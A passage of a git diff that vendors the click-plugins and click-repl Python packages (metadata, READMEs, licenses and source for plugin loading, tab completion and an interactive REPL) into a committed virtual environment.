) + +Plugin developers can access this with: + +.. code-block:: python + + import click + import parent_cli_package.cli.options + + + @click.command() + @parent_cli_package.cli.options.jobs_opt + def subcommand(jobs): + """I do something domain specific.""" + + +Installation +------------ + +With ``pip``: + +.. code-block:: console + + $ pip install click-plugins + +From source: + +.. code-block:: console + + $ git clone https://github.com/click-contrib/click-plugins.git + $ cd click-plugins + $ python setup.py install + + +Developing +---------- + +.. 
code-block:: console + + $ git clone https://github.com/click-contrib/click-plugins.git + $ cd click-plugins + $ pip install -e .\[dev\] + $ pytest tests --cov click_plugins --cov-report term-missing + + +Changelog +--------- + +See ``CHANGES.txt`` + + +Authors +------- + +See ``AUTHORS.txt`` + + +License +------- + +See ``LICENSE.txt`` + diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/RECORD b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/RECORD new file mode 100644 index 00000000..a0bceebf --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/RECORD @@ -0,0 +1,12 @@ +click_plugins-1.1.1.dist-info/AUTHORS.txt,sha256=FUhD9wZxX5--d9KS7hUB-wnHgyS67pdnWvADk8lrLeE,90 +click_plugins-1.1.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click_plugins-1.1.1.dist-info/LICENSE.txt,sha256=ovxTmp55udvfNAMB8D-Wci6bCbFy-kiV9mnwwmQrj3o,1517 +click_plugins-1.1.1.dist-info/METADATA,sha256=LFOtPppAX0RN1Wwn7A2Pq46juwOppLlvUGR2VNRgAPk,6390 +click_plugins-1.1.1.dist-info/RECORD,, +click_plugins-1.1.1.dist-info/WHEEL,sha256=HX-v9-noUkyUoxyZ1PMSuS7auUxDAR4VBdoYLqD0xws,110 +click_plugins-1.1.1.dist-info/top_level.txt,sha256=oB_GDZcOeOKX1eKKCfqSMR4tfJS6iL3zJshaJJPSQUI,14 +click_plugins-1.1.1.dist-info/zip-safe,sha256=AbpHGcgLb-kRsJGnwFEktk7uzpZOCcBY74-YBdrKVGs,1 +click_plugins/__init__.py,sha256=lAwJ0n4PqZCv7hk5Fz6yNL7TRrXKuhynDBGiaNSUNvo,2247 +click_plugins/__pycache__/__init__.cpython-310.pyc,, +click_plugins/__pycache__/core.cpython-310.pyc,, +click_plugins/core.py,sha256=4hhmUpFi6MSYsvxogksNu5dlKEWNscbiE9ynUy5dPdE,2475 diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/WHEEL b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/WHEEL new file mode 100644 index 00000000..c8240f03 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.33.1) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/top_level.txt b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/top_level.txt new file mode 100644 index 00000000..22e5b9b9 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/top_level.txt @@ -0,0 +1 @@ +click_plugins diff --git a/env/Lib/site-packages/click_plugins-1.1.1.dist-info/zip-safe b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/zip-safe new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/env/Lib/site-packages/click_plugins-1.1.1.dist-info/zip-safe @@ -0,0 +1 @@ + diff --git a/env/Lib/site-packages/click_plugins/__init__.py b/env/Lib/site-packages/click_plugins/__init__.py new file mode 100644 index 00000000..6bdfe38e --- /dev/null +++ b/env/Lib/site-packages/click_plugins/__init__.py @@ -0,0 +1,61 @@ +""" +An extension module for click to enable registering CLI commands via setuptools +entry-points. 
+ + + from pkg_resources import iter_entry_points + + import click + from click_plugins import with_plugins + + + @with_plugins(iter_entry_points('entry_point.name')) + @click.group() + def cli(): + '''Commandline interface for something.''' + + @cli.command() + @click.argument('arg') + def subcommand(arg): + '''A subcommand for something else''' +""" + + +from click_plugins.core import with_plugins + + +__version__ = '1.1.1' +__author__ = 'Kevin Wurster, Sean Gillies' +__email__ = 'wursterk@gmail.com, sean.gillies@gmail.com' +__source__ = 'https://github.com/click-contrib/click-plugins' +__license__ = ''' +New BSD License + +Copyright (c) 2015-2019, Kevin D. Wurster, Sean C. Gillies +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +* Neither click-plugins nor the names of its contributors may not be used to + endorse or promote products derived from this software without specific prior + written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +''' diff --git a/env/Lib/site-packages/click_plugins/core.py b/env/Lib/site-packages/click_plugins/core.py new file mode 100644 index 00000000..0d7f5e97 --- /dev/null +++ b/env/Lib/site-packages/click_plugins/core.py @@ -0,0 +1,92 @@ +""" +Core components for click_plugins +""" + + +import click + +import os +import sys +import traceback + + +def with_plugins(plugins): + + """ + A decorator to register external CLI commands to an instance of + `click.Group()`. + + Parameters + ---------- + plugins : iter + An iterable producing one `pkg_resources.EntryPoint()` per iteration. + attrs : **kwargs, optional + Additional keyword arguments for instantiating `click.Group()`. + + Returns + ------- + click.Group() + """ + + def decorator(group): + if not isinstance(group, click.Group): + raise TypeError("Plugins can only be attached to an instance of click.Group()") + + for entry_point in plugins or (): + try: + group.add_command(entry_point.load()) + except Exception: + # Catch this so a busted plugin doesn't take down the CLI. + # Handled by registering a dummy command that does nothing + # other than explain the error. 
+ group.add_command(BrokenCommand(entry_point.name)) + + return group + + return decorator + + +class BrokenCommand(click.Command): + + """ + Rather than completely crash the CLI when a broken plugin is loaded, this + class provides a modified help message informing the user that the plugin is + broken and they should contact the owner. If the user executes the plugin + or specifies `--help` a traceback is reported showing the exception the + plugin loader encountered. + """ + + def __init__(self, name): + + """ + Define the special help messages after instantiating a `click.Command()`. + """ + + click.Command.__init__(self, name) + + util_name = os.path.basename(sys.argv and sys.argv[0] or __file__) + + if os.environ.get('CLICK_PLUGINS_HONESTLY'): # pragma no cover + icon = u'\U0001F4A9' + else: + icon = u'\u2020' + + self.help = ( + "\nWarning: entry point could not be loaded. Contact " + "its author for help.\n\n\b\n" + + traceback.format_exc()) + self.short_help = ( + icon + " Warning: could not load plugin. See `%s %s --help`." + % (util_name, self.name)) + + def invoke(self, ctx): + + """ + Print the traceback instead of doing nothing. + """ + + click.echo(self.help, color=ctx.color) + ctx.exit(1) + + def parse_args(self, ctx, args): + return args diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/INSTALLER b/env/Lib/site-packages/click_repl-0.3.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/LICENSE b/env/Lib/site-packages/click_repl-0.3.0.dist-info/LICENSE new file mode 100644 index 00000000..606882bc --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/LICENSE @@ -0,0 +1,20 @@ +Copyright (c) 2014-2015 Markus Unterwaditzer & contributors. +Copyright (c) 2016-2026 Asif Saif Uddin & contributors. + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. 
diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/METADATA b/env/Lib/site-packages/click_repl-0.3.0.dist-info/METADATA new file mode 100644 index 00000000..593e9939 --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/METADATA @@ -0,0 +1,117 @@ +Metadata-Version: 2.1 +Name: click-repl +Version: 0.3.0 +Summary: REPL plugin for Click +Home-page: https://github.com/untitaker/click-repl +Author: Markus Unterwaditzer +Author-email: markus@unterwaditzer.net +License: MIT +Platform: UNKNOWN +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +License-File: LICENSE +Requires-Dist: click (>=7.0) +Requires-Dist: prompt-toolkit (>=3.0.36) +Provides-Extra: testing +Requires-Dist: pytest-cov (>=4.0.0) ; extra == 'testing' +Requires-Dist: pytest (>=7.2.1) ; extra == 'testing' +Requires-Dist: tox (>=4.4.3) ; extra == 'testing' + +click-repl +=== + +[![Tests](https://github.com/click-contrib/click-repl/actions/workflows/tests.yml/badge.svg?branch=master)](https://github.com/click-contrib/click-repl/actions/workflows/tests.yml) +[![License](https://img.shields.io/pypi/l/click-repl?label=License)](https://github.com/click-contrib/click-repl/LICENSE) +![Python - version](https://img.shields.io/badge/python-3%20%7C%203.7%20%7C%203.8%20%7C%203.9%20%7C%203.10%20%7C%203.11-blue) +[![PyPi - version](https://img.shields.io/badge/pypi-v0.2.0-blue)](https://pypi.org/project/click-repl/) +![wheels](https://img.shields.io/piwheels/v/click-repl?label=wheel) +![PyPI - Status](https://img.shields.io/pypi/status/click) +![PyPI - Downloads](https://img.shields.io/pypi/dm/click-repl) + +Installation +=== + +Installation is done via pip: +``` +pip install click-repl +``` +Usage +=== + +In your [click](http://click.pocoo.org/) app: + +```py +import click +from click_repl import register_repl + +@click.group() +def cli(): + pass + +@cli.command() +def hello(): + click.echo("Hello world!") + +register_repl(cli) +cli() +``` +In the shell: +``` +$ my_app repl +> hello +Hello world! +> ^C +$ echo hello | my_app repl +Hello world! +``` +**Features not shown:** + +- Tab-completion. +- The parent context is reused, which means `ctx.obj` persists between + subcommands. If you're keeping caches on that object (like I do), using the + app's repl instead of the shell is a huge performance win. +- `!` - prefix executes shell commands. + +You can use the internal `:help` command to explain usage. + +Advanced Usage +=== + +For more flexibility over how your REPL works you can use the `repl` function +directly instead of `register_repl`. For example, in your app: + +```py +import click +from click_repl import repl +from prompt_toolkit.history import FileHistory + +@click.group() +def cli(): + pass + +@cli.command() +def myrepl(): + prompt_kwargs = { + 'history': FileHistory('/etc/myrepl/myrepl-history'), + } + repl(click.get_current_context(), prompt_kwargs=prompt_kwargs) + +cli() +``` +And then your custom `myrepl` command will be available on your CLI, which +will start a REPL which has its history stored in +`/etc/myrepl/myrepl-history` and persist between sessions. 
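+
+As a rough sketch of what a session with that command might look like (assuming the
+group above is installed as `my_app`, as in the earlier examples, and that it also
+exposes the `hello` command shown under Usage), the REPL can then be entered and left
+with the built-in `:exit` internal command:
+
+```
+$ my_app myrepl
+> hello
+Hello world!
+> :exit
+$
+```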
+ +Any arguments that can be passed to the [`python-prompt-toolkit`](https://github.com/prompt-toolkit/python-prompt-toolkit) [Prompt](http://python-prompt-toolkit.readthedocs.io/en/stable/pages/reference.html?prompt_toolkit.shortcuts.Prompt#prompt_toolkit.shortcuts.Prompt) class +can be passed in the `prompt_kwargs` argument and will be used when +instantiating your `Prompt`. + + diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/RECORD b/env/Lib/site-packages/click_repl-0.3.0.dist-info/RECORD new file mode 100644 index 00000000..49b67d1f --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/RECORD @@ -0,0 +1,16 @@ +click_repl-0.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +click_repl-0.3.0.dist-info/LICENSE,sha256=w5qXIkFz5heQemLXVoSEvYPgWlplXqlCQH3DWjIetDE,1141 +click_repl-0.3.0.dist-info/METADATA,sha256=DF4pXhK8sH8aQ33WNAfX-umqGuIG8fgTmjehMdmBqG0,3553 +click_repl-0.3.0.dist-info/RECORD,, +click_repl-0.3.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +click_repl-0.3.0.dist-info/top_level.txt,sha256=F6rJUNCBcNeCP3tglg54K9NGWoA0azS09pH1B3V5LbQ,11 +click_repl/__init__.py,sha256=t3mMAVXruN3TZ72aXXHqk__ySRx7yyia8S8QnFd8Oq8,514 +click_repl/__pycache__/__init__.cpython-310.pyc,, +click_repl/__pycache__/_completer.cpython-310.pyc,, +click_repl/__pycache__/_repl.cpython-310.pyc,, +click_repl/__pycache__/exceptions.cpython-310.pyc,, +click_repl/__pycache__/utils.cpython-310.pyc,, +click_repl/_completer.py,sha256=0otlzltYbyc6BLv-kGV1S-jKPASd-ZJPfyiXsR9BkLE,9760 +click_repl/_repl.py,sha256=ABz22IoLkKEcfU7_gHbXTk7e96oxrUgDuumyjMs-ja8,4513 +click_repl/exceptions.py,sha256=b2623jlSGVISztcC07xZ6Dg1OwGbsyhwGDkEWRlQ2yU,445 +click_repl/utils.py,sha256=2r--kMG24BaF8d_RypX2KSpfKdrWkPI2YEHd5cFCbMY,6119 diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/WHEEL b/env/Lib/site-packages/click_repl-0.3.0.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/click_repl-0.3.0.dist-info/top_level.txt b/env/Lib/site-packages/click_repl-0.3.0.dist-info/top_level.txt new file mode 100644 index 00000000..4cf6be7d --- /dev/null +++ b/env/Lib/site-packages/click_repl-0.3.0.dist-info/top_level.txt @@ -0,0 +1 @@ +click_repl diff --git a/env/Lib/site-packages/click_repl/__init__.py b/env/Lib/site-packages/click_repl/__init__.py new file mode 100644 index 00000000..df3cea88 --- /dev/null +++ b/env/Lib/site-packages/click_repl/__init__.py @@ -0,0 +1,11 @@ +from ._completer import ClickCompleter as ClickCompleter # noqa: F401 +from ._repl import register_repl as register_repl # noqa: F401 +from ._repl import repl as repl # noqa: F401 +from .exceptions import CommandLineParserError as CommandLineParserError # noqa: F401 +from .exceptions import ExitReplException as ExitReplException # noqa: F401 +from .exceptions import ( # noqa: F401 + InternalCommandException as InternalCommandException, +) +from .utils import exit as exit # noqa: F401 + +__version__ = "0.3.0" diff --git a/env/Lib/site-packages/click_repl/_completer.py b/env/Lib/site-packages/click_repl/_completer.py new file mode 100644 index 00000000..a5922fee --- /dev/null +++ b/env/Lib/site-packages/click_repl/_completer.py @@ -0,0 +1,296 @@ +from __future__ import unicode_literals + +import os +from glob import iglob + +import click +from 
prompt_toolkit.completion import Completion, Completer + +from .utils import _resolve_context, split_arg_string + +__all__ = ["ClickCompleter"] + +IS_WINDOWS = os.name == "nt" + + +# Handle backwards compatibility between Click<=7.0 and >=8.0 +try: + import click.shell_completion + + HAS_CLICK_V8 = True + AUTO_COMPLETION_PARAM = "shell_complete" +except (ImportError, ModuleNotFoundError): + import click._bashcomplete # type: ignore[import] + + HAS_CLICK_V8 = False + AUTO_COMPLETION_PARAM = "autocompletion" + + +def text_type(text): + return "{}".format(text) + + +class ClickCompleter(Completer): + __slots__ = ("cli", "ctx", "parsed_args", "parsed_ctx", "ctx_command") + + def __init__(self, cli, ctx): + self.cli = cli + self.ctx = ctx + self.parsed_args = [] + self.parsed_ctx = ctx + self.ctx_command = ctx.command + + def _get_completion_from_autocompletion_functions( + self, + param, + autocomplete_ctx, + args, + incomplete, + ): + param_choices = [] + + if HAS_CLICK_V8: + autocompletions = param.shell_complete(autocomplete_ctx, incomplete) + else: + autocompletions = param.autocompletion( # type: ignore[attr-defined] + autocomplete_ctx, args, incomplete + ) + + for autocomplete in autocompletions: + if isinstance(autocomplete, tuple): + param_choices.append( + Completion( + text_type(autocomplete[0]), + -len(incomplete), + display_meta=autocomplete[1], + ) + ) + + elif HAS_CLICK_V8 and isinstance( + autocomplete, click.shell_completion.CompletionItem + ): + param_choices.append( + Completion(text_type(autocomplete.value), -len(incomplete)) + ) + + else: + param_choices.append( + Completion(text_type(autocomplete), -len(incomplete)) + ) + + return param_choices + + def _get_completion_from_choices_click_le_7(self, param, incomplete): + if not getattr(param.type, "case_sensitive", True): + incomplete = incomplete.lower() + return [ + Completion( + text_type(choice), + -len(incomplete), + display=text_type(repr(choice) if " " in choice else choice), + ) + for choice in param.type.choices # type: ignore[attr-defined] + if choice.lower().startswith(incomplete) + ] + + else: + return [ + Completion( + text_type(choice), + -len(incomplete), + display=text_type(repr(choice) if " " in choice else choice), + ) + for choice in param.type.choices # type: ignore[attr-defined] + if choice.startswith(incomplete) + ] + + def _get_completion_for_Path_types(self, param, args, incomplete): + if "*" in incomplete: + return [] + + choices = [] + _incomplete = os.path.expandvars(incomplete) + search_pattern = _incomplete.strip("'\"\t\n\r\v ").replace("\\\\", "\\") + "*" + quote = "" + + if " " in _incomplete: + for i in incomplete: + if i in ("'", '"'): + quote = i + break + + for path in iglob(search_pattern): + if " " in path: + if quote: + path = quote + path + else: + if IS_WINDOWS: + path = repr(path).replace("\\\\", "\\") + else: + if IS_WINDOWS: + path = path.replace("\\", "\\\\") + + choices.append( + Completion( + text_type(path), + -len(incomplete), + display=text_type(os.path.basename(path.strip("'\""))), + ) + ) + + return choices + + def _get_completion_for_Boolean_type(self, param, incomplete): + return [ + Completion( + text_type(k), -len(incomplete), display_meta=text_type("/".join(v)) + ) + for k, v in { + "true": ("1", "true", "t", "yes", "y", "on"), + "false": ("0", "false", "f", "no", "n", "off"), + }.items() + if any(i.startswith(incomplete) for i in v) + ] + + def _get_completion_from_params(self, autocomplete_ctx, args, param, incomplete): + + choices = [] + param_type = param.type + + # 
shell_complete method for click.Choice is intorduced in click-v8 + if not HAS_CLICK_V8 and isinstance(param_type, click.Choice): + choices.extend( + self._get_completion_from_choices_click_le_7(param, incomplete) + ) + + elif isinstance(param_type, click.types.BoolParamType): + choices.extend(self._get_completion_for_Boolean_type(param, incomplete)) + + elif isinstance(param_type, (click.Path, click.File)): + choices.extend(self._get_completion_for_Path_types(param, args, incomplete)) + + elif getattr(param, AUTO_COMPLETION_PARAM, None) is not None: + choices.extend( + self._get_completion_from_autocompletion_functions( + param, + autocomplete_ctx, + args, + incomplete, + ) + ) + + return choices + + def _get_completion_for_cmd_args( + self, + ctx_command, + incomplete, + autocomplete_ctx, + args, + ): + choices = [] + param_called = False + + for param in ctx_command.params: + if isinstance(param.type, click.types.UnprocessedParamType): + return [] + + elif getattr(param, "hidden", False): + continue + + elif isinstance(param, click.Option): + for option in param.opts + param.secondary_opts: + # We want to make sure if this parameter was called + # If we are inside a parameter that was called, we want to show only + # relevant choices + if option in args[param.nargs * -1 :]: # noqa: E203 + param_called = True + break + + elif option.startswith(incomplete): + choices.append( + Completion( + text_type(option), + -len(incomplete), + display_meta=text_type(param.help or ""), + ) + ) + + if param_called: + choices = self._get_completion_from_params( + autocomplete_ctx, args, param, incomplete + ) + + elif isinstance(param, click.Argument): + choices.extend( + self._get_completion_from_params( + autocomplete_ctx, args, param, incomplete + ) + ) + + return choices + + def get_completions(self, document, complete_event=None): + # Code analogous to click._bashcomplete.do_complete + + args = split_arg_string(document.text_before_cursor, posix=False) + + choices = [] + cursor_within_command = ( + document.text_before_cursor.rstrip() == document.text_before_cursor + ) + + if document.text_before_cursor.startswith(("!", ":")): + return + + if args and cursor_within_command: + # We've entered some text and no space, give completions for the + # current word. + incomplete = args.pop() + else: + # We've not entered anything, either at all or for the current + # command, so give all relevant completions for this context. 
+ incomplete = "" + + if self.parsed_args != args: + self.parsed_args = args + self.parsed_ctx = _resolve_context(args, self.ctx) + self.ctx_command = self.parsed_ctx.command + + if getattr(self.ctx_command, "hidden", False): + return + + try: + choices.extend( + self._get_completion_for_cmd_args( + self.ctx_command, incomplete, self.parsed_ctx, args + ) + ) + + if isinstance(self.ctx_command, click.MultiCommand): + incomplete_lower = incomplete.lower() + + for name in self.ctx_command.list_commands(self.parsed_ctx): + command = self.ctx_command.get_command(self.parsed_ctx, name) + if getattr(command, "hidden", False): + continue + + elif name.lower().startswith(incomplete_lower): + choices.append( + Completion( + text_type(name), + -len(incomplete), + display_meta=getattr(command, "short_help", ""), + ) + ) + + except Exception as e: + click.echo("{}: {}".format(type(e).__name__, str(e))) + + # If we are inside a parameter that was called, we want to show only + # relevant choices + # if param_called: + # choices = param_choices + + for item in choices: + yield item diff --git a/env/Lib/site-packages/click_repl/_repl.py b/env/Lib/site-packages/click_repl/_repl.py new file mode 100644 index 00000000..5693f52b --- /dev/null +++ b/env/Lib/site-packages/click_repl/_repl.py @@ -0,0 +1,152 @@ +from __future__ import with_statement + +import click +import sys +from prompt_toolkit import PromptSession +from prompt_toolkit.history import InMemoryHistory + +from ._completer import ClickCompleter +from .exceptions import ClickExit # type: ignore[attr-defined] +from .exceptions import CommandLineParserError, ExitReplException, InvalidGroupFormat +from .utils import _execute_internal_and_sys_cmds + + +__all__ = ["bootstrap_prompt", "register_repl", "repl"] + + +def bootstrap_prompt( + group, + prompt_kwargs, + ctx=None, +): + """ + Bootstrap prompt_toolkit kwargs or use user defined values. + + :param group: click Group + :param prompt_kwargs: The user specified prompt kwargs. + """ + + defaults = { + "history": InMemoryHistory(), + "completer": ClickCompleter(group, ctx=ctx), + "message": "> ", + } + + defaults.update(prompt_kwargs) + return defaults + + +def repl( + old_ctx, prompt_kwargs={}, allow_system_commands=True, allow_internal_commands=True +): + """ + Start an interactive shell. All subcommands are available in it. + + :param old_ctx: The current Click context. + :param prompt_kwargs: Parameters passed to + :py:func:`prompt_toolkit.PromptSession`. + + If stdin is not a TTY, no prompt will be printed, but only commands read + from stdin. 
+ """ + + group_ctx = old_ctx + # Switching to the parent context that has a Group as its command + # as a Group acts as a CLI for all of its subcommands + if old_ctx.parent is not None and not isinstance(old_ctx.command, click.Group): + group_ctx = old_ctx.parent + + group = group_ctx.command + + # An Optional click.Argument in the CLI Group, that has no value + # will consume the first word from the REPL input, causing issues in + # executing the command + # So, if there's an empty Optional Argument + for param in group.params: + if ( + isinstance(param, click.Argument) + and group_ctx.params[param.name] is None + and not param.required + ): + raise InvalidGroupFormat( + f"{type(group).__name__} '{group.name}' requires value for " + f"an optional argument '{param.name}' in REPL mode" + ) + + isatty = sys.stdin.isatty() + + # Delete the REPL command from those available, as we don't want to allow + # nesting REPLs (note: pass `None` to `pop` as we don't want to error if + # REPL command already not present for some reason). + repl_command_name = old_ctx.command.name + if isinstance(group_ctx.command, click.CommandCollection): + available_commands = { + cmd_name: cmd_obj + for source in group_ctx.command.sources + for cmd_name, cmd_obj in source.commands.items() + } + else: + available_commands = group_ctx.command.commands + + original_command = available_commands.pop(repl_command_name, None) + + if isatty: + prompt_kwargs = bootstrap_prompt(group, prompt_kwargs, group_ctx) + session = PromptSession(**prompt_kwargs) + + def get_command(): + return session.prompt() + + else: + get_command = sys.stdin.readline + + while True: + try: + command = get_command() + except KeyboardInterrupt: + continue + except EOFError: + break + + if not command: + if isatty: + continue + else: + break + + try: + args = _execute_internal_and_sys_cmds( + command, allow_internal_commands, allow_system_commands + ) + if args is None: + continue + + except CommandLineParserError: + continue + + except ExitReplException: + break + + try: + # The group command will dispatch based on args. 
+ old_protected_args = group_ctx.protected_args + try: + group_ctx.protected_args = args + group.invoke(group_ctx) + finally: + group_ctx.protected_args = old_protected_args + except click.ClickException as e: + e.show() + except (ClickExit, SystemExit): + pass + + except ExitReplException: + break + + if original_command is not None: + available_commands[repl_command_name] = original_command + + +def register_repl(group, name="repl"): + """Register :func:`repl()` as sub-command *name* of *group*.""" + group.command(name=name)(click.pass_context(repl)) diff --git a/env/Lib/site-packages/click_repl/exceptions.py b/env/Lib/site-packages/click_repl/exceptions.py new file mode 100644 index 00000000..78c7dd09 --- /dev/null +++ b/env/Lib/site-packages/click_repl/exceptions.py @@ -0,0 +1,23 @@ +class InternalCommandException(Exception): + pass + + +class ExitReplException(InternalCommandException): + pass + + +class CommandLineParserError(Exception): + pass + + +class InvalidGroupFormat(Exception): + pass + + +# Handle click.exceptions.Exit introduced in Click 7.0 +try: + from click.exceptions import Exit as ClickExit +except (ImportError, ModuleNotFoundError): + + class ClickExit(RuntimeError): # type: ignore[no-redef] + pass diff --git a/env/Lib/site-packages/click_repl/utils.py b/env/Lib/site-packages/click_repl/utils.py new file mode 100644 index 00000000..9aa98008 --- /dev/null +++ b/env/Lib/site-packages/click_repl/utils.py @@ -0,0 +1,222 @@ +import click +import os +import shlex +import sys +from collections import defaultdict + +from .exceptions import CommandLineParserError, ExitReplException + + +__all__ = [ + "_execute_internal_and_sys_cmds", + "_exit_internal", + "_get_registered_target", + "_help_internal", + "_resolve_context", + "_register_internal_command", + "dispatch_repl_commands", + "handle_internal_commands", + "split_arg_string", + "exit", +] + + +# Abstract datatypes in collections module are moved to collections.abc +# module in Python 3.3 +if sys.version_info >= (3, 3): + from collections.abc import Iterable, Mapping # noqa: F811 +else: + from collections import Iterable, Mapping + + +def _resolve_context(args, ctx=None): + """Produce the context hierarchy starting with the command and + traversing the complete arguments. This only follows the commands, + it doesn't trigger input prompts or callbacks. + + :param args: List of complete args before the incomplete value. + :param cli_ctx: `click.Context` object of the CLI group + """ + + while args: + command = ctx.command + + if isinstance(command, click.MultiCommand): + if not command.chain: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + ctx = cmd.make_context(name, args, parent=ctx, resilient_parsing=True) + args = ctx.protected_args + ctx.args + else: + while args: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + sub_ctx = cmd.make_context( + name, + args, + parent=ctx, + allow_extra_args=True, + allow_interspersed_args=False, + resilient_parsing=True, + ) + args = sub_ctx.args + + ctx = sub_ctx + args = [*sub_ctx.protected_args, *sub_ctx.args] + else: + break + + return ctx + + +_internal_commands = {} + + +def split_arg_string(string, posix=True): + """Split an argument string as with :func:`shlex.split`, but don't + fail if the string is incomplete. Ignores a missing closing quote or + incomplete escape sequence and uses the partial token as-is. + .. 
code-block:: python + split_arg_string("example 'my file") + ["example", "my file"] + split_arg_string("example my\\") + ["example", "my"] + :param string: String to split. + """ + + lex = shlex.shlex(string, posix=posix) + lex.whitespace_split = True + lex.commenters = "" + out = [] + + try: + for token in lex: + out.append(token) + except ValueError: + # Raised when end-of-string is reached in an invalid state. Use + # the partial token as-is. The quote or escape character is in + # lex.state, not lex.token. + out.append(lex.token) + + return out + + +def _register_internal_command(names, target, description=None): + if not hasattr(target, "__call__"): + raise ValueError("Internal command must be a callable") + + if isinstance(names, str): + names = [names] + + elif isinstance(names, Mapping) or not isinstance(names, Iterable): + raise ValueError( + '"names" must be a string, or an iterable object, but got "{}"'.format( + type(names).__name__ + ) + ) + + for name in names: + _internal_commands[name] = (target, description) + + +def _get_registered_target(name, default=None): + target_info = _internal_commands.get(name) + if target_info: + return target_info[0] + return default + + +def _exit_internal(): + raise ExitReplException() + + +def _help_internal(): + formatter = click.HelpFormatter() + formatter.write_heading("REPL help") + formatter.indent() + + with formatter.section("External Commands"): + formatter.write_text('prefix external commands with "!"') + + with formatter.section("Internal Commands"): + formatter.write_text('prefix internal commands with ":"') + info_table = defaultdict(list) + + for mnemonic, target_info in _internal_commands.items(): + info_table[target_info[1]].append(mnemonic) + + formatter.write_dl( # type: ignore[arg-type] + ( # type: ignore[arg-type] + ", ".join(map(":{}".format, sorted(mnemonics))), + description, + ) + for description, mnemonics in info_table.items() + ) + + val = formatter.getvalue() # type: str + return val + + +_register_internal_command(["q", "quit", "exit"], _exit_internal, "exits the repl") +_register_internal_command( + ["?", "h", "help"], _help_internal, "displays general 